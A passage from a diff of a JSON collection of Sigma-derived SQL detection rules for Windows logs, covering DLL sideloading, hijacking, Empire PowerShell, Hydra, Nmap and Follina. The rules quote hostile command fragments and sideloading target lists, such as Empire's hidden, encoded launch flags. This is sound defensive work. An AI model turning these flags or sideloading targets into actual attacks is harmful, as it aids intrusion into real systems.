'%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' 
OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND 
ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Network administrator computer" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + 
"filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "status": "experimental", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", 
"tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "status": "experimental", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.t1202", 